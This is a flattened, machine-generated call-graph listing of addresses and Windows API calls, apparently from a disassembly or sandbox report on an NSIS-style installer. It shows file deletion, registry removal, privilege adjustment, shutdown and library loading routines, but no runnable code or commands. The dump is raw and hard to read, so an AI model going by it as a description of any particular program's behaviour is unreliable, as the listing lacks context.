4032b3 4149->4153 4152 4032fc 4150->4152 4152->4147 4156 403300 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4152->4156 4308 405d0c lstrcpynA 4153->4308 4154 40334a 4157 4033e0 4154->4157 4160 4033d0 4154->4160 4164 4057a9 CharNextA 4154->4164 4159 4030bb 12 API calls 4156->4159 4311 4035b2 4157->4311 4162 40332e 4159->4162 4252 40368c 4160->4252 4162->4147 4162->4157 4165 403365 4164->4165 4172 403410 4165->4172 4173 4033ab 4165->4173 4166 403518 4169 403520 GetCurrentProcess OpenProcessToken 4166->4169 4170 40359a ExitProcess 4166->4170 4167 4033fa 4318 405502 4167->4318 4175 40356b 4169->4175 4176 40353b LookupPrivilegeValueA AdjustTokenPrivileges 4169->4176 4322 405485 4172->4322 4177 40586c 18 API calls 4173->4177 4179 4060a5 5 API calls 4175->4179 4176->4175 4180 4033b6 4177->4180 4182 403572 4179->4182 4180->4157 4309 405d0c lstrcpynA 4180->4309 4185 403587 ExitWindowsEx 4182->4185 4186 403593 4182->4186 4183 403431 lstrcatA lstrcmpiA 4183->4157 4188 40344d 4183->4188 4184 403426 lstrcatA 4184->4183 4185->4170 4185->4186 4335 40140b 4186->4335 4191 403452 4188->4191 4192 403459 4188->4192 4190 4033c5 4310 405d0c lstrcpynA 4190->4310 4325 4053eb CreateDirectoryA 4191->4325 4330 405468 CreateDirectoryA 4192->4330 4196 40345e SetCurrentDirectoryA 4198 403478 4196->4198 4199 40346d 4196->4199 4334 405d0c lstrcpynA 4198->4334 4333 405d0c lstrcpynA 4199->4333 4202 405d2e 18 API calls 4203 4034b7 DeleteFileA 4202->4203 4204 4034c4 CopyFileA 4203->4204 4209 403486 4203->4209 4204->4209 4205 40350c 4206 405bc7 38 API calls 4205->4206 4206->4157 4207 405bc7 38 API calls 4207->4209 4208 405d2e 18 API calls 4208->4209 4209->4202 4209->4205 4209->4207 4209->4208 4210 40549d 2 API calls 4209->4210 4211 4034f8 CloseHandle 4209->4211 4210->4209 4211->4209 4212->4136 4213->4138 4215 405f77 5 API calls 4214->4215 4217 4030c7 4215->4217 4216 4030d1 4216->4145 4217->4216 4218 40577e 3 API calls 4217->4218 4219 4030d9 4218->4219 4220 405468 2 API calls 4219->4220 4221 4030df 4220->4221 4338 4059ae 4221->4338 4342 40597f GetFileAttributesA CreateFileA 4224->4342 4226 402ca6 4245 402cb6 4226->4245 4343 405d0c lstrcpynA 4226->4343 4228 402ccc 4229 4057c5 2 API calls 4228->4229 4230 402cd2 4229->4230 4344 405d0c lstrcpynA 4230->4344 4232 402cdd GetFileSize 4233 402dd9 4232->4233 4251 402cf4 4232->4251 4345 402c02 4233->4345 4235 402de2 4237 402e12 GlobalAlloc 4235->4237 4235->4245 4357 4030a4 SetFilePointer 4235->4357 4236 40308e ReadFile 4236->4251 4356 4030a4 SetFilePointer 4237->4356 4240 402e45 4242 402c02 6 API calls 4240->4242 4241 402e2d 4244 402e9f 32 API calls 4241->4244 4242->4245 4243 402dfb 4246 40308e ReadFile 4243->4246 4249 402e39 4244->4249 4245->4154 4247 402e06 4246->4247 4247->4237 4247->4245 4248 402c02 6 API calls 4248->4251 4249->4245 4249->4249 4250 402e76 SetFilePointer 4249->4250 4250->4245 4251->4233 4251->4236 4251->4240 4251->4245 4251->4248 4253 4060a5 5 API calls 4252->4253 4254 4036a0 4253->4254 4255 4036a6 4254->4255 4256 4036b8 4254->4256 4367 405c6a wsprintfA 4255->4367 4257 405bf3 3 API calls 4256->4257 4258 4036e3 4257->4258 4260 403701 lstrcatA 4258->4260 4262 405bf3 3 API calls 4258->4262 4261 4036b6 4260->4261 4358 403951 4261->4358 4262->4260 4265 40586c 18 API calls 4266 403733 4265->4266 4267 4037bc 4266->4267 4269 405bf3 3 API calls 4266->4269 4268 40586c 18 API calls 4267->4268 4270 4037c2 4268->4270 4271 40375f 4269->4271 4272 4037d2 LoadImageA 4270->4272 4273 405d2e 18 API calls 4270->4273 4271->4267 4276 40377b lstrlenA 4271->4276 4281 4057a9 CharNextA 4271->4281 4274 403878 4272->4274 4275 4037f9 RegisterClassA 4272->4275 4273->4272 4279 40140b 2 API calls 4274->4279 4277 403882 4275->4277 4278 40382f SystemParametersInfoA CreateWindowExA 4275->4278 4282 403789 lstrcmpiA 4276->4282 4283 4037af 4276->4283 4277->4157 4278->4274 4280 40387e 4279->4280 4280->4277 4287 403951 19 API calls 4280->4287 4285 403779 4281->4285 4282->4283 4286 403799 GetFileAttributesA 4282->4286 4284 40577e 3 API calls 4283->4284 4288 4037b5 4284->4288 4285->4276 4289 4037a5 4286->4289 4291 40388f 4287->4291 4368 405d0c lstrcpynA 4288->4368 4289->4283 4290 4057c5 2 API calls 4289->4290 4290->4283 4293 40389b ShowWindow 4291->4293 4294 40391e 4291->4294 4296 406037 3 API calls 4293->4296 4295 404ff7 5 API calls 4294->4295 4297 403924 4295->4297 4298 4038b3 4296->4298 4299 403940 4297->4299 4300 403928 4297->4300 4301 4038c1 GetClassInfoA 4298->4301 4303 406037 3 API calls 4298->4303 4302 40140b 2 API calls 4299->4302 4300->4277 4306 40140b 2 API calls 4300->4306 4304 4038d5 GetClassInfoA RegisterClassA 4301->4304 4305 4038eb DialogBoxParamA 4301->4305 4302->4277 4303->4301 4304->4305 4307 40140b 2 API calls 4305->4307 4306->4277 4307->4277 4308->4143 4309->4190 4310->4160 4312 4035ca 4311->4312 4313 4035bc CloseHandle 4311->4313 4370 4035f7 4312->4370 4313->4312 4316 4055ae 69 API calls 4317 4033e9 OleUninitialize 4316->4317 4317->4166 4317->4167 4320 405517 4318->4320 4319 403408 ExitProcess 4320->4319 4321 40552b MessageBoxIndirectA 4320->4321 4321->4319 4323 4060a5 5 API calls 4322->4323 4324 403415 lstrcatA 4323->4324 4324->4183 4324->4184 4326 403457 4325->4326 4327 40543c GetLastError 4325->4327 4326->4196 4327->4326 4328 40544b SetFileSecurityA 4327->4328 4328->4326 4329 405461 GetLastError 4328->4329 4329->4326 4331 405478 4330->4331 4332 40547c GetLastError 4330->4332 4331->4196 4332->4331 4333->4198 4334->4209 4336 401389 2 API calls 4335->4336 4337 401420 4336->4337 4337->4170 4339 4059b9 GetTickCount GetTempFileNameA 4338->4339 4340 4059e6 4339->4340 4341 4030ea 4339->4341 4340->4339 4340->4341 4341->4145 4342->4226 4343->4228 4344->4232 4346 402c23 4345->4346 4347 402c0b 4345->4347 4350 402c33 GetTickCount 4346->4350 4351 402c2b 4346->4351 4348 402c14 DestroyWindow 4347->4348 4349 402c1b 4347->4349 4348->4349 4349->4235 4352 402c41 CreateDialogParamA ShowWindow 4350->4352 4353 402c64 4350->4353 4354 4060e1 2 API calls 4351->4354 4352->4353 4353->4235 4355 402c31 4354->4355 4355->4235 4356->4241 4357->4243 4359 403965 4358->4359 4369 405c6a wsprintfA 4359->4369 4361 4039d6 4362 405d2e 18 API calls 4361->4362 4363 4039e2 SetWindowTextA 4362->4363 4364 403711 4363->4364 4365 4039fe 4363->4365 4364->4265 4365->4364 4366 405d2e 18 API calls 4365->4366 4366->4365 4367->4261 4368->4267 4369->4361 4371 403605 4370->4371 4372 40360a FreeLibrary GlobalFree 4371->4372 4373 4035cf 4371->4373 4372->4372 4372->4373 4373->4316 4967 401eee 4968 402a3a 18 API calls 4967->4968 4969 401ef5 4968->4969 4970 4060a5 5 API calls 4969->4970 4971 401f04 4970->4971 4972 401f1c GlobalAlloc 4971->4972 4975 401f84 4971->4975 4973 401f30 4972->4973 4972->4975 4974 4060a5 5 API calls 4973->4974 4976 401f37 4974->4976 4977 4060a5 5 API calls 4976->4977 4978 401f41 4977->4978 4978->4975 4982 405c6a wsprintfA 4978->4982 4980 401f78 4983 405c6a wsprintfA 4980->4983 4982->4980 4983->4975 4984 4014f0 SetForegroundWindow 4985 4028cf 4984->4985 4986 100015b3 4987 100014bb GlobalFree 4986->4987 4989 100015cb 4987->4989 4988 10001611 GlobalFree 4989->4988 4990 100015e6 4989->4990 4991 100015fd VirtualFree 4989->4991 4990->4988 4991->4988 4997 4018f5 4998 40192c 4997->4998 4999 402a3a 18 API calls 4998->4999 5000 401931 4999->5000 5001 4055ae 69 API calls 5000->5001 5002 40193a 5001->5002 5003 4024f7 5004 402a3a 18 API calls 5003->5004 5005 4024fe 5004->5005 5008 40597f GetFileAttributesA CreateFileA 5005->5008 5007 40250a 5008->5007 5009 4018f8 5010 402a3a 18 API calls 5009->5010 5011 4018ff 5010->5011 5012 405502 MessageBoxIndirectA 5011->5012 5013 401908 5012->5013 5014 1000103d 5015 1000101b 5 API calls 5014->5015 5016 10001056 5015->5016 5017 4014fe 5018 401506 5017->5018 5020 401519 5017->5020 5019 402a1d 18 API calls 5018->5019 5019->5020 5021 402b7f 5022 402ba7 5021->5022 5023 402b8e SetTimer 5021->5023 5024 402bfc 5022->5024 5025 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5022->5025 5023->5022 5025->5024 5026 401000 5027 401037 BeginPaint GetClientRect 5026->5027 5030 40100c DefWindowProcA 5026->5030 5028 4010f3 5027->5028 5032 401073 CreateBrushIndirect FillRect DeleteObject 5028->5032 5033 4010fc 5028->5033 5031 401179 5030->5031 5032->5028 5034 401102 CreateFontIndirectA 5033->5034 5035 401167 EndPaint 5033->5035 5034->5035 5036 401112 6 API calls 5034->5036 5035->5031 5036->5035 5037 404680 5038 404690 5037->5038 5039 4046ac 5037->5039 5048 4054e6 GetDlgItemTextA 5038->5048 5041 4046b2 SHGetPathFromIDListA 5039->5041 5042 4046df 5039->5042 5044 4046c9 SendMessageA 5041->5044 5045 4046c2 5041->5045 5043 40469d SendMessageA 5043->5039 5044->5042 5047 40140b 2 API calls 5045->5047 5047->5044 5048->5043 5049 402482 5050 402b44 19 API calls 5049->5050 5051 40248c 5050->5051 5052 402a1d 18 API calls 5051->5052 5053 402495 5052->5053 5054 4024b8 RegEnumValueA 5053->5054 5055 4024ac RegEnumKeyA 5053->5055 5056 4026a6 5053->5056 5054->5056 5057 4024d1 RegCloseKey 5054->5057 5055->5057 5057->5056 5059 401b02 5060 402a3a 18 API calls 5059->5060 5061 401b09 5060->5061 5062 402a1d 18 API calls 5061->5062 5063 401b12 wsprintfA 5062->5063 5064 4028cf 5063->5064 3862 402283 3863 402291 3862->3863 3864 40228b 3862->3864 3865 4022a1 3863->3865 3867 402a3a 18 API calls 3863->3867 3866 402a3a 18 API calls 3864->3866 3868 402a3a 18 API calls 3865->3868 3870 4022af 3865->3870 3866->3863 3867->3865 3868->3870 3872 402a3a 3870->3872 3873 402a46 3872->3873 3874 405d2e 18 API calls 3873->3874 3876 402a67 3874->3876 3875 4022b8 WritePrivateProfileStringA 3876->3875 3877 405f77 5 API calls 3876->3877 3877->3875 5065 401a03 5066 402a3a 18 API calls 5065->5066 5067 401a0c ExpandEnvironmentStringsA 5066->5067 5068 401a20 5067->5068 5070 401a33 5067->5070 5069 401a25 lstrcmpA 5068->5069 5068->5070 5069->5070 5071 100029c3 5072 100029db 5071->5072 5073 10001534 2 API calls 5072->5073 5074 100029f6 5073->5074 5075 404005 lstrcpynA lstrlenA 3957 402308 3958 402338 3957->3958 3959 40230d 3957->3959 3961 402a3a 18 API calls 3958->3961 3969 402b44 3959->3969 3963 40233f 3961->3963 3962 402314 3964 40231e 3962->3964 3968 402355 3962->3968 3973 402a7a RegOpenKeyExA 3963->3973 3965 402a3a 18 API calls 3964->3965 3967 402325 RegDeleteValueA RegCloseKey 3965->3967 3967->3968 3970 402a3a 18 API calls 3969->3970 3971 402b5d 3970->3971 3972 402b6b RegOpenKeyExA 3971->3972 3972->3962 3974 402b0e 3973->3974 3978 402aa5 3973->3978 3974->3968 3975 402acb RegEnumKeyA 3976 402add RegCloseKey 3975->3976 3975->3978 3984 4060a5 GetModuleHandleA 3976->3984 3977 402b02 RegCloseKey 3983 402af1 3977->3983 3978->3975 3978->3976 3978->3977 3980 402a7a 5 API calls 3978->3980 3980->3978 3982 402b1d RegDeleteKeyA 3982->3983 3983->3974 3985 4060c1 3984->3985 3986 4060cb GetProcAddress 3984->3986 3990 406037 GetSystemDirectoryA 3985->3990 3988 402aed 3986->3988 3988->3982 3988->3983 3989 4060c7 3989->3986 3989->3988 3991 406059 wsprintfA LoadLibraryExA 3990->3991 3991->3989 5076 402688 5077 402a3a 18 API calls 5076->5077 5078 40268f FindFirstFileA 5077->5078 5079 4026b2 5078->5079 5082 4026a2 5078->5082 5080 4026b9 5079->5080 5084 405c6a wsprintfA 5079->5084 5085 405d0c lstrcpynA 5080->5085 5084->5080 5085->5082 5086 401c8a 5087 402a1d 18 API calls 5086->5087 5088 401c90 IsWindow 5087->5088 5089 4019f3 5088->5089 4374 402410 4375 402b44 19 API calls 4374->4375 4376 40241a 4375->4376 4377 402a3a 18 API calls 4376->4377 4378 402423 4377->4378 4379 40242d RegQueryValueExA 4378->4379 4381 4026a6 4378->4381 4380 40244d 4379->4380 4384 402453 RegCloseKey 4379->4384 4380->4384 4385 405c6a wsprintfA 4380->4385 4384->4381 4385->4384 4386 401f90 4387 401fa2 4386->4387 4396 402050 4386->4396 4388 402a3a 18 API calls 4387->4388 4390 401fa9 4388->4390 4389 401423 25 API calls 4397 4021c9 4389->4397 4391 402a3a 18 API calls 4390->4391 4392 401fb2 4391->4392 4393 401fc7 LoadLibraryExA 4392->4393 4394 401fba GetModuleHandleA 4392->4394 4395 401fd7 GetProcAddress 4393->4395 4393->4396 4394->4393 4394->4395 4398 402023 4395->4398 4399 401fe6 4395->4399 4396->4389 4400 404f25 25 API calls 4398->4400 4401 402005 4399->4401 4402 401fee 4399->4402 4403 401ff6 4400->4403 4407 100016bd 4401->4407 4449 401423 4402->4449 4403->4397 4405 402044 FreeLibrary 4403->4405 4405->4397 4408 100016ed 4407->4408 4452 10001a5d 4408->4452 4410 100016f4 4411 1000180a 4410->4411 4412 10001705 4410->4412 4413 1000170c 4410->4413 4411->4403 4501 100021b0 4412->4501 4484 100021fa 4413->4484 4418 10001770 4424 100017b2 4418->4424 4425 10001776 4418->4425 4419 10001752 4514 100023da 4419->4514 4420 10001722 4423 10001728 4420->4423 4428 10001733 4420->4428 4421 1000173b 4434 10001731 4421->4434 4511 10002aa3 4421->4511 4423->4434 4495 100027e8 4423->4495 4426 100023da 11 API calls 4424->4426 4430 10001559 3 API calls 4425->4430 4432 100017a4 4426->4432 4427 10001758 4525 10001559 4427->4525 4505 10002589 4428->4505 4436 1000178c 4430->4436 4440 100017f9 4432->4440 4536 100023a0 4432->4536 4434->4418 4434->4419 4439 100023da 11 API calls 4436->4439 4438 10001739 4438->4434 4439->4432 4440->4411 4444 10001803 GlobalFree 4440->4444 4444->4411 4446 100017e5 4446->4440 4540 100014e2 wsprintfA 4446->4540 4447 100017de FreeLibrary 4447->4446 4450 404f25 25 API calls 4449->4450 4451 401431 4450->4451 4451->4403 4543 10001215 GlobalAlloc 4452->4543 4454 10001a81 4544 10001215 GlobalAlloc 4454->4544 4456 10001cbb GlobalFree GlobalFree GlobalFree 4457 10001cd8 4456->4457 4473 10001d22 4456->4473 4458 1000201a 4457->4458 4468 10001ced 4457->4468 4457->4473 4460 1000203c GetModuleHandleA 4458->4460 4458->4473 4459 10001b60 GlobalAlloc 4461 10001a8c 4459->4461 4463 10002062 4460->4463 4464 1000204d LoadLibraryA 4460->4464 4461->4456 4461->4459 4462 10001bc9 GlobalFree 4461->4462 4465 10001bab lstrcpyA 4461->4465 4466 10001bb5 lstrcpyA 4461->4466 4472 10001f7a 4461->4472 4461->4473 4478 10001e75 GlobalFree 4461->4478 4479 10001224 2 API calls 4461->4479 4483 10001c07 4461->4483 4550 10001215 GlobalAlloc 4461->4550 4462->4461 4551 100015a4 GetProcAddress 4463->4551 4464->4463 4464->4473 4465->4466 4466->4461 4468->4473 4547 10001224 4468->4547 4469 100020b3 4470 100020c0 lstrlenA 4469->4470 4469->4473 4552 100015a4 GetProcAddress 4470->4552 4472->4473 4477 10001fbe lstrcpyA 4472->4477 4473->4410 4474 10002074 4474->4469 4482 1000209d GetProcAddress 4474->4482 4477->4473 4478->4461 4479->4461 4480 100020d9 4480->4473 4482->4469 4483->4461 4545 10001534 GlobalSize GlobalAlloc 4483->4545 4493 10002212 4484->4493 4486 10002349 GlobalFree 4487 10001712 4486->4487 4486->4493 4487->4420 4487->4421 4487->4434 4488 100022b9 GlobalAlloc MultiByteToWideChar 4491 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4488->4491 4492 10002303 4488->4492 4489 1000230a lstrlenA 4489->4486 4489->4492 4490 10001224 GlobalAlloc lstrcpynA 4490->4493 4491->4486 4492->4486 4558 1000251d 4492->4558 4493->4486 4493->4488 4493->4489 4493->4490 4554 100012ad 4493->4554 4497 100027fa 4495->4497 4496 1000289f EnumWindows 4498 100028bd 4496->4498 4497->4496 4499 100029b9 4498->4499 4500 100029ae GetLastError 4498->4500 4499->4434 4500->4499 4502 100021c0 4501->4502 4504 1000170b 4501->4504 4503 100021d2 GlobalAlloc 4502->4503 4502->4504 4503->4502 4504->4413 4509 100025a5 4505->4509 4506 100025f6 GlobalAlloc 4510 10002618 4506->4510 4507 10002609 4508 1000260e GlobalSize 4507->4508 4507->4510 4508->4510 4509->4506 4509->4507 4510->4438 4512 10002aae 4511->4512 4513 10002aee GlobalFree 4512->4513 4561 10001215 GlobalAlloc 4514->4561 4516 100023e6 4517 1000243a lstrcpynA 4516->4517 4518 1000244b StringFromGUID2 WideCharToMultiByte 4516->4518 4519 1000246f WideCharToMultiByte 4516->4519 4520 100024b4 GlobalFree 4516->4520 4521 10002490 wsprintfA 4516->4521 4522 100024ee GlobalFree 4516->4522 4523 10001266 2 API calls 4516->4523 4562 100012d1 4516->4562 4517->4516 4518->4516 4519->4516 4520->4516 4521->4516 4522->4427 4523->4516 4566 10001215 GlobalAlloc 4525->4566 4527 1000155f 4529 10001586 4527->4529 4530 1000156c lstrcpyA 4527->4530 4531 100015a0 4529->4531 4532 1000158b wsprintfA 4529->4532 4530->4531 4533 10001266 4531->4533 4532->4531 4534 100012a8 GlobalFree 4533->4534 4535 1000126f GlobalAlloc lstrcpynA 4533->4535 4534->4432 4535->4534 4537 100017c5 4536->4537 4538 100023ae 4536->4538 4537->4446 4537->4447 4538->4537 4539 100023c7 GlobalFree 4538->4539 4539->4538 4541 10001266 2 API calls 4540->4541 4542 10001503 4541->4542 4542->4440 4543->4454 4544->4461 4546 10001552 4545->4546 4546->4483 4553 10001215 GlobalAlloc 4547->4553 4549 10001233 lstrcpynA 4549->4473 4550->4461 4551->4474 4552->4480 4553->4549 4555 100012b4 4554->4555 4556 10001224 2 API calls 4555->4556 4557 100012cf 4556->4557 4557->4493 4559 10002581 4558->4559 4560 1000252b VirtualAlloc 4558->4560 4559->4492 4560->4559 4561->4516 4563 100012f9 4562->4563 4564 100012da 4562->4564 4563->4516 4564->4563 4565 100012e0 lstrcpyA 4564->4565 4565->4563 4566->4527 5090 401490 5091 404f25 25 API calls 5090->5091 5092 401497 5091->5092 5093 401595 5094 402a3a 18 API calls 5093->5094 5095 40159c SetFileAttributesA 5094->5095 5096 4015ae 5095->5096 4629 402616 4630 40261d 4629->4630 4636 40287c 4629->4636 4631 402a1d 18 API calls 4630->4631 4632 402628 4631->4632 4633 40262f SetFilePointer 4632->4633 4634 40263f 4633->4634 4633->4636 4637 405c6a wsprintfA 4634->4637 4637->4636 5097 401717 5098 402a3a 18 API calls 5097->5098 5099 40171e SearchPathA 5098->5099 5100 401739 5099->5100 5101 10001058 5103 10001074 5101->5103 5102 100010dc 5103->5102 5104 100014bb GlobalFree 5103->5104 5105 10001091 5103->5105 5104->5105 5106 100014bb GlobalFree 5105->5106 5107 100010a1 5106->5107 5108 100010b1 5107->5108 5109 100010a8 GlobalSize 5107->5109 5110 100010b5 GlobalAlloc 5108->5110 5111 100010c6 5108->5111 5109->5108 5112 100014e2 3 API calls 5110->5112 5113 100010d1 GlobalFree 5111->5113 5112->5111 5113->5102 5114 404e99 5115 404ea9 5114->5115 5116 404ebd 5114->5116 5117 404eaf 5115->5117 5126 404f06 5115->5126 5118 404ec5 IsWindowVisible 5116->5118 5122 404edc 5116->5122 5120 403f3d SendMessageA 5117->5120 5121 404ed2 5118->5121 5118->5126 5119 404f0b CallWindowProcA 5123 404eb9 5119->5123 5120->5123 5127 4047f0 SendMessageA 5121->5127 5122->5119 5132 404870 5122->5132 5126->5119 5128 404813 GetMessagePos ScreenToClient SendMessageA 5127->5128 5129 40484f SendMessageA 5127->5129 5130 404847 5128->5130 5131 40484c 5128->5131 5129->5130 5130->5122 5131->5129 5141 405d0c lstrcpynA 5132->5141 5134 404883 5142 405c6a wsprintfA 5134->5142 5136 40488d 5137 40140b 2 API calls 5136->5137 5138 404896 5137->5138 5143 405d0c lstrcpynA 5138->5143 5140 40489d 5140->5126 5141->5134 5142->5136 5143->5140 5144 402519 5145 40252e 5144->5145 5146 40251e 5144->5146 5148 402a3a 18 API calls 5145->5148 5147 402a1d 18 API calls 5146->5147 5150 402527 5147->5150 5149 402535 lstrlenA 5148->5149 5149->5150 5151 402557 5150->5151 5152 405a26 WriteFile 5150->5152 5152->5151 5153 40149d 5154 4014ab PostQuitMessage 5153->5154 5155 40226e 5153->5155 5154->5155 4653 403a1e 4654 403b71 4653->4654 4655 403a36 4653->4655 4657 403b82 GetDlgItem GetDlgItem 4654->4657 4658 403bc2 4654->4658 4655->4654 4656 403a42 4655->4656 4660 403a60 4656->4660 4661 403a4d SetWindowPos 4656->4661 4662 403ef1 19 API calls 4657->4662 4659 403c1c 4658->4659 4670 401389 2 API calls 4658->4670 4664 403f3d SendMessageA 4659->4664 4671 403b6c 4659->4671 4665 403a65 ShowWindow 4660->4665 4666 403a7d 4660->4666 4661->4660 4663 403bac SetClassLongA 4662->4663 4667 40140b 2 API calls 4663->4667 4691 403c2e 4664->4691 4665->4666 4668 403a85 DestroyWindow 4666->4668 4669 403a9f 4666->4669 4667->4658 4672 403e7a 4668->4672 4673 403aa4 SetWindowLongA 4669->4673 4674 403ab5 4669->4674 4675 403bf4 4670->4675 4672->4671 4684 403eab ShowWindow 4672->4684 4673->4671 4677 403ac1 GetDlgItem 4674->4677 4678 403b5e 4674->4678 4675->4659 4679 403bf8 SendMessageA 4675->4679 4676 403e7c DestroyWindow EndDialog 4676->4672 4681 403af1 4677->4681 4682 403ad4 SendMessageA IsWindowEnabled 4677->4682 4683 403f58 8 API calls 4678->4683 4679->4671 4680 40140b 2 API calls 4680->4691 4686 403afe 4681->4686 4688 403b45 SendMessageA 4681->4688 4689 403b11 4681->4689 4697 403af6 4681->4697 4682->4671 4682->4681 4683->4671 4684->4671 4685 405d2e 18 API calls 4685->4691 4686->4688 4686->4697 4687 403eca SendMessageA 4690 403b2c 4687->4690 4688->4678 4692 403b19 4689->4692 4693 403b2e 4689->4693 4690->4678 4691->4671 4691->4676 4691->4680 4691->4685 4694 403ef1 19 API calls 4691->4694 4699 403ef1 19 API calls 4691->4699 4714 403dbc DestroyWindow 4691->4714 4696 40140b 2 API calls 4692->4696 4695 40140b 2 API calls 4693->4695 4694->4691 4698 403b35 4695->4698 4696->4697 4697->4687 4698->4678 4698->4697 4700 403ca9 GetDlgItem 4699->4700 4701 403cc6 ShowWindow KiUserCallbackDispatcher 4700->4701 4702 403cbe 4700->4702 4723 403f13 KiUserCallbackDispatcher 4701->4723 4702->4701 4704 403cf0 EnableWindow 4707 403d04 4704->4707 4705 403d09 GetSystemMenu EnableMenuItem SendMessageA 4706 403d39 SendMessageA 4705->4706 4705->4707 4706->4707 4707->4705 4724 403f26 SendMessageA 4707->4724 4725 405d0c lstrcpynA 4707->4725 4710 403d67 lstrlenA 4711 405d2e 18 API calls 4710->4711 4712 403d78 SetWindowTextA 4711->4712 4713 401389 2 API calls 4712->4713 4713->4691 4714->4672 4715 403dd6 CreateDialogParamA 4714->4715 4715->4672 4716 403e09 4715->4716 4717 403ef1 19 API calls 4716->4717 4718 403e14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4717->4718 4719 401389 2 API calls 4718->4719 4720 403e5a 4719->4720 4720->4671 4721 403e62 ShowWindow 4720->4721 4722 403f3d SendMessageA 4721->4722 4722->4672 4723->4704 4724->4707 4725->4710 5156 100010e0 5165 1000110e 5156->5165 5157 100011c4 GlobalFree 5158 100012ad 2 API calls 5158->5165 5159 100011c3 5159->5157 5160 10001266 2 API calls 5164 100011b1 GlobalFree 5160->5164 5161 10001155 GlobalAlloc 5161->5165 5162 100011ea GlobalFree 5162->5165 5163 100012d1 lstrcpyA 5163->5165 5164->5165 5165->5157 5165->5158 5165->5159 5165->5160 5165->5161 5165->5162 5165->5163 5165->5164 5166 4048a2 GetDlgItem GetDlgItem 5167 4048f4 7 API calls 5166->5167 5175 404b0c 5166->5175 5168 404997 DeleteObject 5167->5168 5169 40498a SendMessageA 5167->5169 5170 4049a0 5168->5170 5169->5168 5172 4049d7 5170->5172 5174 405d2e 18 API calls 5170->5174 5171 404bf0 5173 404c9c 5171->5173 5182 404c49 SendMessageA 5171->5182 5208 404aff 5171->5208 5176 403ef1 19 API calls 5172->5176 5178 404ca6 SendMessageA 5173->5178 5179 404cae 5173->5179 5180 4049b9 SendMessageA SendMessageA 5174->5180 5175->5171 5185 4047f0 5 API calls 5175->5185 5209 404b7d 5175->5209 5177 4049eb 5176->5177 5181 403ef1 19 API calls 5177->5181 5178->5179 5190 404cc0 ImageList_Destroy 5179->5190 5191 404cc7 5179->5191 5201 404cd7 5179->5201 5180->5170 5186 4049f9 5181->5186 5188 404c5e SendMessageA 5182->5188 5182->5208 5183 403f58 8 API calls 5189 404e92 5183->5189 5184 404be2 SendMessageA 5184->5171 5185->5209 5193 404acd GetWindowLongA SetWindowLongA 5186->5193 5200 404a48 SendMessageA 5186->5200 5203 404ac7 5186->5203 5205 404a84 SendMessageA 5186->5205 5206 404a95 SendMessageA 5186->5206 5187 404e46 5195 404e58 ShowWindow GetDlgItem ShowWindow 5187->5195 5187->5208 5194 404c71 5188->5194 5190->5191 5192 404cd0 GlobalFree 5191->5192 5191->5201 5192->5201 5196 404ae6 5193->5196 5202 404c82 SendMessageA 5194->5202 5195->5208 5197 404b04 5196->5197 5198 404aec ShowWindow 5196->5198 5218 403f26 SendMessageA 5197->5218 5217 403f26 SendMessageA 5198->5217 5200->5186 5201->5187 5207 404870 4 API calls 5201->5207 5213 404d12 5201->5213 5202->5173 5203->5193 5203->5196 5205->5186 5206->5186 5207->5213 5208->5183 5209->5171 5209->5184 5210 404e1c InvalidateRect 5210->5187 5211 404e32 5210->5211 5219 4047ab 5211->5219 5212 404d40 SendMessageA 5216 404d56 5212->5216 5213->5212 5213->5216 5215 404dca SendMessageA SendMessageA 5215->5216 5216->5210 5216->5215 5217->5208 5218->5175 5222 4046e6 5219->5222 5221 4047c0 5221->5187 5223 4046fc 5222->5223 5224 405d2e 18 API calls 5223->5224 5225 404760 5224->5225 5226 405d2e 18 API calls 5225->5226 5227 40476b 5226->5227 5228 405d2e 18 API calls 5227->5228 5229 404781 lstrlenA wsprintfA SetDlgItemTextA 5228->5229 5229->5221 5230 10002162 5231 100021c0 5230->5231 5232 100021f6 5230->5232 5231->5232 5233 100021d2 GlobalAlloc 5231->5233 5233->5231 5234 401ca7 5235 402a1d 18 API calls 5234->5235 5236 401cae 5235->5236 5237 402a1d 18 API calls 5236->5237 5238 401cb6 GetDlgItem 5237->5238 5239 402513 5238->5239 3993 40192a 3994 40192c 3993->3994 3995 402a3a 18 API calls 3994->3995 3996 401931 3995->3996 3999 4055ae 3996->3999 4039 40586c 3999->4039 4002 4055d6 DeleteFileA 4004 40193a 4002->4004 4003 4055ed 4005 40571b 4003->4005 4053 405d0c lstrcpynA 4003->4053 4005->4004 4071 406010 FindFirstFileA 4005->4071 4007 405613 4008 405626 4007->4008 4009 405619 lstrcatA 4007->4009 4054 4057c5 lstrlenA 4008->4054 4010 40562c 4009->4010 4014 40563a lstrcatA 4010->4014 4016 405645 lstrlenA FindFirstFileA 4010->4016 4014->4016 4015 405743 4074 40577e lstrlenA CharPrevA 4015->4074 4016->4005 4027 405669 4016->4027 4019 4057a9 CharNextA 4019->4027 4020 405566 5 API calls 4021 405755 4020->4021 4022 405759 4021->4022 4023 40576f 4021->4023 4022->4004 4029 404f25 25 API calls 4022->4029 4026 404f25 25 API calls 4023->4026 4024 4056fa FindNextFileA 4024->4027 4028 405712 FindClose 4024->4028 4026->4004 4027->4019 4027->4024 4036 4056bb 4027->4036 4058 405d0c lstrcpynA 4027->4058 4028->4005 4030 405766 4029->4030 4031 405bc7 38 API calls 4030->4031 4034 40576d 4031->4034 4033 4055ae 62 API calls 4033->4036 4034->4004 4035 404f25 25 API calls 4035->4024 4036->4024 4036->4033 4036->4035 4037 404f25 25 API calls 4036->4037 4059 405566 4036->4059 4067 405bc7 MoveFileExA 4036->4067 4037->4036 4077 405d0c lstrcpynA 4039->4077 4041 40587d 4078 405817 CharNextA CharNextA 4041->4078 4044 4055ce 4044->4002 4044->4003 4045 405f77 5 API calls 4051 405893 4045->4051 4046 4058be lstrlenA 4047 4058c9 4046->4047 4046->4051 4049 40577e 3 API calls 4047->4049 4048 406010 2 API calls 4048->4051 4050 4058ce GetFileAttributesA 4049->4050 4050->4044 4051->4044 4051->4046 4051->4048 4052 4057c5 2 API calls 4051->4052 4052->4046 4053->4007 4055 4057d2 4054->4055 4056 4057e3 4055->4056 4057 4057d7 CharPrevA 4055->4057 4056->4010 4057->4055 4057->4056 4058->4027 4084 40595a GetFileAttributesA 4059->4084 4062 405581 RemoveDirectoryA 4064 40558f 4062->4064 4063 405589 DeleteFileA 4063->4064 4065 405593 4064->4065 4066 40559f SetFileAttributesA 4064->4066 